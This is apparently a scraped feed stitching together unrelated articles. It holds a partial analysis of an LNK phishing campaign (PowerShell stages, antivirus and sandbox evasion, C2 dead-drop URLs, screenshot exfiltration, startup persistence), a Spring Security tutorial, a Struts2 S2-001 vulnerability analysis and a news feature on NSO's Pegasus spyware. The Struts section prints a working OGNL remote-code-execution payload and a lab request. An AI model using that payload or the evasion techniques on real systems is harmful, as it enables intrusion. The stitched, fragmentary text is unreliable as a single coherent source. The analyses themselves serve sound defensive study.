先将lnk文件从文件头开始,偏移为2334,大小为136848字节的内容写入“A_Dhabi.pdf”,该文件保存在temp目录,而该文件确实为一个pdf文件。接着打开该pdf文件,让受害者误以为只是简单得打开了一个正常的pdf文件而已:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
打开的pdf文件如下:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
接着将lnk文件中pdf文件之后的338459字节的内容,写入“%temp%\~.tmpF292.ps1”文件中,该文件为powershell脚本:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
最后将接下来的读取位置写入”%temp%\~.tmpF293”文件中,并利用powershell将“~.tmpF292.ps1”文件给执行起来:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
4.~.tmpF292.ps1分析

原始的ps1脚本是经过加密后的脚本:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
经过解密后,发现两个特殊的明文字符串: “Lorem Ipsum is simply dummy text of the printing and typesettingindustry. Lorem Ipsum has been the industrys standard dummy text ever since the1500s” 和“when an unknown printer took a galley of typeand scrambled it to make a type specimen book. It has survived not only fivecenturies but also the leap into electronic typesetting remaining essentiallyunchanged.”

这两个字符串没有参与加密代码的计算,基本上没有任何意义。

而使用搜索引擎搜索该字符后发现,该字符串是为了排版测试的:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动

加密的代码经过解密,代码逻辑就十分清晰了:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
其中, $code = @”到”@部分为powershell里调用的c#方法,后面为powershell脚本命令。

该powershell脚本的主要功能为:

1)使用WMI,检测安全软件,包括AVG、AVAST,若存在,则删除中间文件,然后退出;


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
2)判断是否有wireshark和Nmap,若存在,则不执行木马核心功能;
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
3)从~.tmpF293”文件中获取文件偏移,然后从lnk文件中读取信息,然后存入“%temp%\ ~.tmpF291”目录中,涉及到的文件名有~.tmpF222.tmp、~.tmpF295.ico、~.tmpF299.vbe;
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
4)继续会从lnk中读取第二阶段的payload,并利用网上获取到的key对payload进行解密并执行。若网络不通未拿到key,就将第二阶段的payload以加密状态存储在“%temp%\ ~.tmp.e”文件中;
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
5)如果“%temp%\ ~.tmp.e”文件存在,会利用从网络上获取的key去解密此文件,得到第二阶段的payload文件“~.tmpF294.ps1”,并执行此文件。
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动

6)获取解密key的url,存储在tmpF222.tmp文件中:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
获取到url如下:

https://youtu.be/40rHiF75z5o

https://brady4th.wordpress.com/2018/11/15/opener/

https://twitter.com/Fancy65716779

https://plus.google.com/u/0/collection/U84ZPF

然后,从这些url中获取相应的解密代码,其中:

“Yobro i sing”字符串开始的位置为stage2 payload的c2;

“My keyboard doesnt work”开始的字符串为解密key:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
从文章的发表时间,我们猜测,真正的攻击开始时间发生在11月15日和11月18日。

7)持久性攻击:在startup目录创建快捷方式,快捷方式会cscript.exe将“~.tmpF291“目录 中的” ~.tmpF299.vbe“文件给执行起来,快捷方式图标为” ~.tmpF295.ico“


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
“~.tmpF299.vbe”解密后内容如下:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
5.Stage2(~.tmpF294.ps1)分析

~.tmpF294.ps1为stage2的脚本文件,同样经过了加密,解密后可以发现与真正的c2通信等功能都在此ps脚本中。

1)使用WMI命令收集相关计算机信息,然后以json格式发送给C2:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
收集的内容包括计算机名、机器名、杀软信息、系统安装时间、系统版本等。格式中还包含“ace”、“dama”、“king”、“joker”等字样。

2)检测虚拟机等特殊软件:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
3)检测wireshark、winpcap、Nmap等特定软件是否安装:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
4)从twitter、youtube、google、wordpress等网站更新C2:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
5)定时截屏并发送:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
6)执行C2下发的powershell脚本:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
7)隐藏“%temp%\~.tmpF291”目录,特殊的存储路径“AA36ED3F6A22”为ip存储路径、“E4DAFF315DFA”域名存储路径、“~.tmpF297.tmp”为c2下发的序列号存储路径。
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
8)根据服务器指定修改定时截屏时的画面质量及频率:
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
三、 关联分析 1.样本拓线:

经过C2的反查,我们又查到找其余几个相同的样本:


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
Confirm.pdf.lnk,d83f933b2a6c307e17438749eda29f02 Gift-18.pdf.lnk,6f965640bc609f9c5b7fea181a2a83ca

而这两个lnk同样来自于一个zip压缩包:Gift-18.zip


使用钓鱼lnk针对英国、瑞士金融、贸易公司的定向攻击活动
经分析,这两个lnk跟分析的lnk为同一个攻击。而压缩包中还包含了一张图片:

How to get the current user in a Spring Security reactive (WebFlux) and non-reac ...

$
0
0

When developing an application, we sometimes need to access the currently logged in user programmatically. In this post, we’ll discuss how to do that when using Spring Security ― both in non-reactive (Spring MVC) as well as reactive (Spring WebFlux) applications.

The code snippets are derived from the Spring Lemon library. If you haven’t heard of Spring Lemon , it’s a library encapsulating the sophisticated non-functional code and configuration that’s needed when developing reactive and non-reactive real-world RESTful web services using the Spring framework and Spring Boot.

When someone logs in, Spring Security creates an Authentication object. The authentication object has a principal property, which stores the current user.

So, if you can access the Authentication object, you can get the current user, like this:

public static Optional<User> currentUser(Authentication auth) { if (auth != null) { Object principal = auth.getPrincipal(); if (principal instanceof User) // User is your user type that implements UserDetails return Optional.of((User) principal); } return Optional.empty(); }

But, how to get access to the Authentication object?

The authentication object is stored in the SecurityContext object. Given the SecurityContext, a reference to the authentication object can be obtained just as below:

Authentication auth = securityContext.getAuthentication();

How to get access to the SecurityContext becomes the question then. It's different for reactive and non-reactive applications.

Accessing SecurityContext in a non-reactive (Spring MVC) application

Traditional (non-reactive) Spring Security provides a static method to access the security context, which can be called from anywhere, as below

SecurityContext context = SecurityContextHolder.getContext();

Accessing SecurityContext in a reactive (Spring WebFlux) application

Reactive Spring Security provides that in a reactive manner, as below:

Mono<SecurityContext> context = ReactiveSecurityContextHolder.getContext();

Beware that Mono<SecurityContext> returned above is just the assembly that gets resolved later at subscription time. Here is an example usage:

@PostMapping("/current-user") public Mono<UserDto<ID>> getCurrentUser(ServerWebExchange exchange) { return ReactiveSecurityContextHolder.getContext() .map(SecurityContext::getAuthentication) .map(Authentication::getPrincipal) .map(MyPrincipal::currentUser) .zipWith(exchange.getFormData()) .doOnNext(tuple -> { // based on some input parameters, amend the current user data to be returned }) .map(Tuple2::getT1); }

For exact details, refer to LecUtils , LemonUtils and LerUrils of Spring Lemon.

S2-001 漏洞详细分析

$
0
0
0x00 前言

阅读本文需要具备的知识:

熟悉J2EE开发, 主要是JSP开发 了解Struts2框架执行流程 了解Ognl表达式

如果你不具备这些知识, 阅读这篇文章将会是一场艰难的旅行.

0x01 漏洞复现

影响漏洞版本:

WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

漏洞靶机代码: (下方通过该代码进行分析, 务必下载本地对比运行)

https://github.com/dean2021/java_security_book/tree/master/Struts2/s2_001

公布的POC:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"id"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

精简版POC:

%{1+1}

这里我们就用这个最精简的POC,靶机代码在本地运行成功后,我们发送请求:

POST /login.action HTTP/1.1 Host: localhost:8080 Content-Length: 19 Cache-Control: max-age=0 Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost:8080/login.action Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,pt;q=0.7,da;q=0.6 Cookie: JSESSIONID=1478B902172E01647C8DDD6E62390FD1 Connection: close // password=%{1+1} password=%25%7B1%2B1%7D

HTTP响应的内容:

HTTP/1.1 200 Content-Type: text/html;charset=ISO-8859-1 Date: Tue, 18 Dec 2018 09:21:30 GMT Connection: close Content-Length: 1222 // ... 省略 <form id="login" name="login" onsubmit="return true;" action="/login.action" method="post"> <table class="wwFormTable"> <tr> <td class="tdLabel"> <label for="login_password" class="label">password:</label></td> <td> <input type="text" name="password" value="2" id="login_password" /></td> </tr> <tr> <td colspan="2"> <div align="right"> <input type="submit" id="login_0" value="Submit" /></div> </td> </tr> </table> </form>

注意到input的value属性值为2, 证明成功执行了我们的OGNL表达式%{1+1}, 下面我们开始详细分析。

0x02 漏洞分析

通过官网安全公告,我们大概知道问题是出在textfield自定义标签里,如下是我们的index.jsp部分代码:

<%@taglib prefix="s" uri="/struts-tags" %> <s:form action="login"> <s:textfield label="password" name="password"/> <s:submit/> </s:form>

从代码里我们可以看得到,struts2使用了自定义标签库,也就是/struts-tags, 通过阅读 struts2-core-2.0.8.jar!/META-INF/struts-tags.tld 文件,我们得知这个textfield标签实现类是org.apache.struts2.views.jsp.ui.TextFieldTag

public class TextFieldTag extends AbstractUITag { private static final long serialVersionUID = 5811285953670562288L; protected String maxlength; protected String readonly; protected String size; public TextFieldTag() { } public Component getBean(ValueStack stack, HttpServletRequest req, HttpServletResponse res) { return new TextField(stack, req, res); } protected void populateParams() { super.populateParams(); TextField textField = (TextField)this.component; textField.setMaxlength(this.maxlength); textField.setReadonly(this.readonly); textField.setSize(this.size); } /** @deprecated */ public void setMaxLength(String maxlength) { this.maxlength = maxlength; } public void setMaxlength(String maxlength) { this.maxlength = maxlength; } public void setReadonly(String readonly) { this.readonly = readonly; } public void setSize(String size) { this.size = size; } }

了解jsp自定义标签的同学应该知道,这时候我们需要找的是doStartTag方法,因为解析标签是从这个方法开始,具体可以参考[2], 通过在TextFieldTag类的ComponentTagSupport父类我们找到doStartTag方法,

public abstract class ComponentTagSupport extends StrutsBodyTagSupport { protected Component component; public ComponentTagSupport() { } public abstract Component getBean(ValueStack var1, HttpServletRequest var2, HttpServletResponse var3); public int doEndTag() throws JspException { this.component.end(this.pageContext.getOut(), this.getBody()); this.component = null; return 6; } public int doStartTag() throws JspException { this.component = this.getBean(this.getStack(), (HttpServletRequest)this.pageContext.getRequest(), (HttpServletResponse)this.pageContext.getResponse()); Container container = Dispatcher.getInstance().getContainer(); container.inject(this.component); this.populateParams(); boolean evalBody = this.component.start(this.pageContext.getOut()); if (evalBody) { return this.component.usesBody() ? 2 : 1; } else { return 0; } } protected void populateParams() { this.component.setId(this.id); } public Component getComponent() { return this.component; } }

通过对doStartTag方法分析,得知该方法仅是对标签的部分属性初始化,并不是漏洞成因。 所以我们继续分析,当标签结束后,调用doEndTag方法, 继续跟进

public int doEndTag() throws JspException { this.component.end(this.pageContext.getOut(), this.getBody()); this.component = null; return 6; }

这里的end方法是定义在UIbean类中, 跟进end方法实现

public abstract class UIBean extends Component { public boolean end(Writer writer, String body) { // 我们跟进这个方法的实现 this.evaluateParams(); try { super.end(writer, body, false); this.mergeTemplate(writer, this.buildTemplateName(this.template, this.getDefaultTemplate())); } catch (Exception var7) { LOG.error("error when rendering", var7); } finally { this.popComponentStack(); } return false; }

跟进this.evaluateParams方法的实现

public void evaluateParams() { // 省略n行代码 if (...){ // 这个password字符串是解析textfield的name属性得出, 由于代码较多,这里伪代码代替 String name = "password" // 此处是由struts.tag.altSyntax来配置,该属性指定是否允许在Struts2标签中使用OGNL表达式语法 if (this.altSyntax()) { // 将textfield标签的name属性进行拼装, 也就是 exp = "%{password}" expr = "%{" + name + "}"; } // UIBaean.java 306行, 跟进this.findValue方法 this.addParameter("nameValue", this.findValue(expr, valueClazz)); } // 省略n行代码

跟进 this.findValue(this.value, valueClazz)); 函数实现:

public class Component { // expr = "%{password}" protected Object findValue(String expr, Class toType) { if (this.altSyntax() && toType == String.class) { // 跟进该方法 return TextParseUtil.translateVariables('%', expr, this.stack); } else { if (this.altSyntax() && expr.startsWith("%{") && expr.endsWith("}")) { expr = expr.substring(2, expr.length() - 1); } return this.getStack().findValue(expr, toType); } }

跟进 TextParseUtil.translateVariables(‘%’, expr, this.stack); 实现:

public class TextParseUtil { public static String translateVariables(char open, String expression, ValueStack stack) { return translateVariables(open, expression, stack, String.class, null).toString(); } public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) { // deal with the "pure" expressions first! //expression = expression.trim(); Object result = expression; // 循环执行 while (true) { // expression= %{password} // 这段代码就是剔除${}, 保留password int start = expression.indexOf(open + "{"); int length = expression.length(); int x = start + 2; int end; char c; int count = 1; while (start != -1 && x < length && count != 0) { c = expression.charAt(x++); if (c == '{') { count++; } else if (c == '}') { count--; } } end = x - 1; if ((start != -1) && (end != -1) && (count == 0)) { String var = expression.substring(start + 2, end); // 第一次循环时,var是 password,执行返回结果是%{1+1}, // 第二次循环时,var是 1+1, 然后成功执行我们的恶意ognl表达式 Object o = stack.findValue(var, asType); if (evaluator != null) { o = evaluator.evaluate(o); } String left = expression.substring(0, start); String right = expression.substring(end + 1); if (o != null) { if (TextUtils.stringSet(left)) { result = left + o; } else { result = o; } if (TextUtils.stringSet(right)) { result = result + right; } expression = left + o + right; } else { // the variable doesn't exist, so don't display anything result = left + right; expression = left + right; } } else { break; } } return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType); }

如注释中所标注,最终在调用OgnlValueStack.findValue()执行了我们的Ognl表达式 1+1 , 对OgnlValueStack不了解的同学,可以参考[3].

好了,分析完成, 漏洞造成原因是由于递归循环,将参数值当做ognl表达式进行执行,从而造成漏洞.

0x03 漏洞细节 1. 为什么执行%{password}表达式,能拿到我们请求的参数值%{1+1}?

该参数值是在ParametersInterceptor.java文件中进行设置的,熟悉Struts2框架的同学会Interceptor应该不陌生,我们看一下这个参数拦截器的实现代码:

public class ParametersInterceptor extends MethodFilterInterceptor { public String doIntercept(ActionInvocation invocation) throws Exception { // 获取当前请求的action, 也就是LoginAction Object action = invocation.getAction(); if (!(action instanceof NoParameters)) { ActionContext ac = invocation.getInvocationContext(); // 获取当前请求的action的参数, 也就是我们的 password = %{1+1} final Map parameters = ac.getParameters(); // ... 省略n行 if (parameters != null) { Map contextMap = ac.getContextMap(); try { // ... 省略n行 ValueStack stack = ac.getValueStack(); // 将参数丢仅stack, 跟进代码实现... setParameters(action, stack, parameters); } finally { // ... } } } return invocation.invoke(); } protected void setParameters(Object action, ValueStack stack, final Map parameters) { ParameterNameAware parameterNameAware = (action instanceof ParameterNameAware) ? (ParameterNameAware) action : null; Map params = null; if( ordered ) { params = new TreeMap(getOrderedComparator()); params.putAll(parameters); } else { params = new TreeMap(parameters); } for (Iterator iterator = params.entrySet().iterator(); iterator.hasNext();) { Map.Entry entry = (Map.Entry) iterator.next(); String name = entry.getKey().toString(); // ... 省略n行 if (acceptableName) { // 拿到我们的的%{1+1} 也就是我们的恶意ognl表达式 Object value = entry.getValue(); try { // 将我们的参数存放到Ognl Stack中, // passsword=%{1+1} stack.setValue(name, value); } catch (RuntimeException e) { // ... } } } } }

当你发送请求时,这个拦截器会将参数名及参数值存放到Stack中, 这就是为什么执行%{password}能够拿到我们的${1+1}, 所以漏洞触发必须有的流程:

struts.tag.altSyntax配置为true,默认也就是true. 能够控制请求参数,及被请求的action中能够解析请求参数,也就是定义了对应的变量及对应的setter方法,如 private String password; , 不然ParametersInterceptor拦截器里获取不到参数. 跳转的jsp页面需要有个textfield标签, 及标签name属性和参数的key对应. 2. 为什么网上总说从在说Struts2 Validation(表单验证)触发漏洞?

我们上方漏洞触发的必须流程来看,在struts2框架中配置了Validation,如果表单验证失败,必然会跳转到表单提交页面,正好符合我们流程3, 也就是表单提交页面存在textfield标签, 从而触发了漏洞。(一般登录注册处容易出现这样的场景)

0x04 总结

Strtus2框架在开启struts.tag.altSyntax的情况下, 由于Struts2框架将请求参数值当做Ognl表达式执行,从而导致任意代码执行.

0x05 修复方案分析

官方建议Struts升级至2.0.9版本或XWork升级2.0.4版本,上方我们进行分析时,已经得知问题是出在xwork框架中,所以升级xwork版本即可。

我们分析一下修复代码:

struts2 2.0.8源码下载 struts2 2.0.9源码下载

通过分析struts 2.0.9的源码,我们从pom.xml文件中得知,其依赖的xwork包升级为2.0.4 修复了漏洞, 如下:

<dependency> <groupId>com.opensymphony</groupId> <artifactId>xwork</artifactId> <version>2.0.4</version> </dependency>

我们分析一下xwork2.0.4是怎么修复的漏洞

XWork 2.0.3 源码下载

XWork 2.0.4 源码下载

TIPS: jar文件解压命令: jar xvf xxx.jar

上方我们分析过程中也是TextParseUtil这个类的translateVariables方法中执行了OGNL表达式,通过代码比较,我们发现2.0.4对TextParseUtil.java文件进行了修改,下方我们看一下2.0.4的代码:

public class TextParseUtil { private static final int MAX_RECURSION = 1; public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) { // 加了一个MAX_RECURSION常量 return translateVariables(open, expression, stack, asType, evaluator, MAX_RECURSION); } /** * Converted object from variable translation. * * @param open * @param expression * @param stack * @param asType * @param evaluator * @return Converted object from variable translation. */ public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) { // deal with the "pure" expressions first! //expression = expression.trim(); Object result = expression; int loopCount = 1; int pos = 0; while (true) { // 此时expression= %{name} int start = expression.indexOf(open + "{", pos); if (start == -1) { pos = 0; loopCount++; start = expression.indexOf(open + "{"); } // 增加这段代码最为关键,由于我们已知maxLoopCount=1, 第二次循环时loopCount=2,则break跳出当前循环,从而避免了恶意ognl执行 // 其实下方注释已经写得很清楚了 if (loopCount > maxLoopCount ) { // translateVariables prevent infinite loop / expression recursive evaluation // 译: 阻止无限循环,导致表达式递归计算 break; } int length = expression.length(); int x = start + 2; int end; char c; int count = 1; while (start != -1 && x < length && count != 0) { c = expression.charAt(x++); if (c == '{') { count++; } else if (c == '}') { count--; } } end = x - 1; if ((start != -1) && (end != -1) && (count == 0)) { String var = expression.substring(start + 2, end); Object o = stack.findValue(var, asType); if (evaluator != null) { o = evaluator.evaluate(o); } String left = expression.substring(0, start); String right = expression.substring(end + 1); String middle = null; if (o != null) { middle = o.toString(); if (!TextUtils.stringSet(left)) { result = o; } else { result = left + middle; } if (TextUtils.stringSet(right)) { result = result + right; } expression = left + middle + right; } else { // the variable doesn't exist, so don't display anything result = left + right; expression = left + right; } pos = (left != null && left.length() > 0 ? left.length() - 1: 0) + (middle != null && middle.length() > 0 ? middle.length() - 1: 0) + 1; pos = Math.max(pos, 1); } else { break; } } return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType); }

通过阅读代码,我们已经知道Struts2官方修复的方式是增加了一个MAX_RECURSION=1常量,判断循环次数,从而避免递归循环导致ognl表达式执行.

0x06 引用

什么样的漏洞可以要你一条命

$
0
0

以前,雷锋网 (公众号:雷锋网) 宅客频道(微信ID:letshome)编辑写过一篇《 什么样的漏洞买得起北京二环一套房? 》,给出了好几条因洞致富的途径,最近,我重新审视这个问题,引发了一个新疑问,什么样的漏洞会要你一条命?

一条新闻很快回答了我。

本文作者:李勤,雷锋网网络安全专栏作者,微信:qinqin0511

“飞马”出动的蝴蝶效应

10 月 2 日,沙特记者卡舒吉走进了土耳其伊斯坦布尔的领事馆,办理结婚相关手续,然后再也没出来。这是一场异常恐怖的死亡之旅,“活活被肢解”“手被砍下带回去复命”等耸人听闻的描述频频出现。

美国有线电视新闻网(CNN)12 月报道披露,卡舒吉遇害前与友人奥马尔阿卜杜勒阿齐兹在社交 App 上策划了一个名为“网络蜜蜂”的青年“网军”行动,并通过制作视频、设立网站的方式,专门记录沙特人权迫害的事件,他们还讨论了将 SIM 卡从国外寄回沙特、“网军”的资金来源等问题。

没想到,这些讨论被沙特政府知晓了。

友人死亡后,阿卜杜勒阿齐兹十分悲痛,他发现,自己的手机被监听也许是这场悲剧发生的催命符。他把手机送到多伦多大学公民实验室进行检测,研究员告诉阿卜杜勒阿齐兹,他的手机被军用间谍软件入侵了。

研究员称,一家名叫 NSO Group 的以色列公司发明了这个软件,并应沙特政府的要求进行部署。


什么样的漏洞可以要你一条命

图片来源:CodeSec

当然,NSO 是打死不会认的。它发出了“否认”三连:

1.你们没有证据可以说明是我们的技术被用来侵入了阿卜杜勒阿齐兹的手机。

2.我们的技术是帮助政府和执法机构打击恐怖主义和犯罪,完全由以色列政府审查和批准(潜台词:他们要用来干什么我怎么知道,我只负责卖)。

3.NSO 提供的产品由政府客户经营,NSO 的人没有参与。

虽然抵死不认,但谁不知道 NSO 这家公司的黑历史呢?

两年前,由三个 0day 组成的高危漏洞“三叉戟”震惊了苹果手机用户,很多人以为苹果手机是绝对安全的,直到三叉戟戳破了幻想:利用这个漏洞,黑客只要发送恶意链接诱骗用户点击,苹果手机就会被黑客接管,从而窃取短信、邮件、通话记录、电话录音、存储的密码等大量隐私数据,监听并窃取社交软件的聊天信息,甚至开启麦克风偷偷录音并发送给攻击者,而苹果用户完全无法察觉。

这个利用了“三叉戟”的“飞马”间谍软件就是 NSO 搞出来的。当时,人们发现,沙特政府购买了“飞马”之后攻击了某著名人权人士。

这次还是一样的套路,甚至可能还是同一匹“飞马”。

我与360 曾带领团队获得“世界破解大师”称号的顶尖黑客 MJ0011核实,利用这种间谍软件,只要给用户的苹果手机发送一条信息,就能控制其手机,甚至不需要用户点击链接。在沙特记者被害的案例里,这个曾经是0day 的漏洞流转各地,成了N-day,虽然漏洞早已被修复,只要用户的手机没有升级成最新版本,那么依然会中招。

网络大杀器与网络战

蝴蝶煽动了它的翅膀,一场大风暴来袭,与阿卜杜勒阿齐兹通讯的卡舒吉丧命。


什么样的漏洞可以要你一条命

如果你对“这样的漏洞可以要人一命”唏嘘不已,再揭开一层幕布,看上去与漏洞“偶然”关联的卡舒吉之死可能只是漏洞被利用成网络大杀器以及国家级网络战的缩影而已。

与 MJ 的交流更让我确信了这个观点。

我们先来看看 NSO 的背景。

Omri Lavie和Shalev Hulio是 NSO 的创始人,2005年7月到2007年10月,Lavia 曾是以色列政府“雇员”。Hulio曾于1999年8月到2004年11月在以色列国防军(搜救部队)担任连级指挥官,NSO公司的某些员工还在以色列国防军里负责信号情报和代码破译的部门Unit 8200工作过。

《纽约时报》曾报道,NSO 明码标价:监视10个iPhone或安卓用户,NSO 分别向政府机构收取65万美元;5名黑莓用户收取50万美元;5名塞班用户收取30万美元―安装费另算。你可以监视更多目标,外加100个目标将收取80万美元,外加50个目标50万美元,外加20个目标25万美元,外加10个15万美元。年系统维护费用为之后每年总价的17%。

你可以理解为,NSO 是个向政府等机构出售网络武器的供应商,但这种供应商在庞大的网络武器供应链条里,扮演的可能只是小角色。

MJ 告诉我,美国、俄罗斯、英国等本身网络实力很强的国家都有自己的“安全组织”,比如美国有 NSA。出于安全和保密的顾虑,他们一般自研网络军火,“一些小国家自己造不了,就需要向军火商买”。

乌克兰和俄罗斯就是一个实例。最近,一起利用Adobe Flash 0day漏洞的国家级网络攻击行动曝光。360 安全团队发现,此次攻击相关样本很可能来源于乌克兰,攻击目标则指向俄罗斯联邦总统事务管理局所属的医疗机构。

有意思的是,乌克兰此次使用的网络武器疑似购自网络武器公司HackingTeam,这是一家与NSO类似的公司,它因依托政府后台,大力研发、销售监控软件而备受争议。2016年,HackingTeam 因被黑客入侵,秘密被人发现―――它常向一些网络武器研发能力不是很强的国家,比如中东国家,欧洲小国、韩国售卖网络武器。

网络军事实力相差悬殊,处于弱势的国家借这种网络武器供应商平衡战局,漏洞及由此衍生的网络武器蒙上了不一样的政治色彩。

尤其,如果你注意到,11 月 25 日,乌俄两国突发了“刻赤海峡”事件,乌克兰的数艘海军军舰在向刻赤海峡航行期间,与俄罗斯海军发生了激烈冲突。“这次俄乌危机前,乌克兰就在准备这个武器,没过几天,他们就开始实施了攻击,可以说,APT攻击行动和真实的政治和军事事件一直关联发生。”MJ提醒道。

卡舒吉之死中,也暗藏政治较量的漩涡。

《参考消息》10日报道,美国一位匿名的情报官员称,以色列当局批准向沙特情报机关出售电话黑客间谍软件,以令沙特情报机关能够黑入反对政府的人士的手机。以色列之所以这么做,是为了在与伊朗争斗的过程中,与阿拉伯世界的最大国家――沙特建立更稳固的联盟关系。

原来我还天真地以为“什么样的漏洞可以要你一条命”是一个“问题”,实际上,在这种大背景下,它从来不是一个问题,而只是一个“可能注定会发生”的直接产物。

卡舒吉之死让这一层关联摆在了台前,以前只有专业人士才熟知的APT、漏洞、网络战被更多普通人感知到:希拉里邮件泄密、轰轰烈烈的Wannacry 勒索病毒事件,以及乌克兰电厂两度受到黑客攻击,几百万人无法取暖,在寒冬中瑟瑟发抖,亲身体验了网络战的可怕。

较量

如果你关注国际厂商的漏洞“PWN”比赛,会发现这两年来中国参赛者越来越少,这些战队转换了 PWN 的阵地,大家对漏洞力量的认知达到了空前的高度。

既然漏洞及其所代表的网络武器威力这么大,为何没有什么规定可以平衡一下国际间的各种力量?

其实是有的。

2013年12月,《关于常规武器和两用物品及技术出口控制的瓦森纳安排》(简称《瓦森纳协定》)附加条款的修订,将一些特殊的入侵软件列入其两用物项清单中。2015年5月20日,美国商务部下属的工业与安全局(BIS)提出实施规则草案《2013年<瓦森纳协议>全会决议的执行:入侵和检测物项》,草案界定入侵软件包括“计算机和具有网络功能的设备使用入侵软件而识别漏洞的网络渗透测试产品在内”,拟将入侵软件纳入美国《出口管理条例(EAR)》的管控范围。

MJ认为,尽管如此,《瓦森纳协定》只是成员国之间的“游戏”。

“如果卖家要将漏洞利用等有双重用途的技术卖到非成员国,需要申请军火执照,这是很难的。很多大家知道的公司把漏洞卖给政客,处在比较灰色的地带,最后都没有申请这个执照。而且很多漏洞交易都违反了《瓦森纳协定》, 包括意大利的 Hacking Team,他们将漏洞武器卖到中东等非成员国家,但向 Hacking Team 卖漏洞的很多人来自美国等瓦森纳成员国家, 明明违反了这个协定,却没有被追究责任,这个协定有点像君子协定,没有特别大的约束意义。它并不是法律协定,要求成员国在各自的国家通过各自的法律实现,但这种实现就有很多不确定性。 其实是美国为了限制非盟国发展这些武器技术所做的协定,而且可以交给意大利 Hacking Team再辗转卖到中东,但卖给中国就不行,是一个比较双标的协定。”

宅客频道了解到,目前除了这个规定外,没有其他关于漏洞交易等专门成文的规定,但是从近几年我国政策层的动向看,我国很重视网络空间相关数据和信息的管控与治理,比如今年我国出台了关键数据出境管控的规定,未来可能有望看到有针对漏洞的相关法律法规。

与漏洞密切相关的“帽子”们则有三种选择:

1.直接公开,坏人能用,好人也能修复,但大家都暴露在风险之下;

2.向厂商报告,修复这个漏洞,厂商可能会回报一些赏金,虽然金额肯定和黑市价格差别很大,但漏洞提交人可获得致谢或入选名人堂的荣誉;

3.卖给漏洞买卖商,甚至亲自做漏洞武器。

我们已经见过形形色色的选择,还有因为一些对操作细节的不同认定而引发的提交人与厂商之间的纠纷,但这都是另外的故事了。

后记

坊间传闻, MJ 之前在众著名战队中杀出重围,带队获得“世界破解大师”至高荣誉,但今年则转换战场,参加国内比赛。


什么样的漏洞可以要你一条命

我曾以为,对 MJ 而言,这是一个让人失落的问题。没想到,MJ 相当坦然:“我们日常的工作并不是为了打比赛,而是为了更好地保护用户,和黑帽子竞争发现更多漏洞,这是我们的目标。打比赛只是一个副产物,或者让公众知道你有这种能力,确实通过一些比赛,可以让用户知道哪个手机更安全、哪个浏览器更安全,它的意义在于能够向公众展示你在实际生活中可能会遇到这样的攻击,有什么样的威胁,这是有意义的,但能不能出去打或者在哪里打,不是特别重要的事情。”

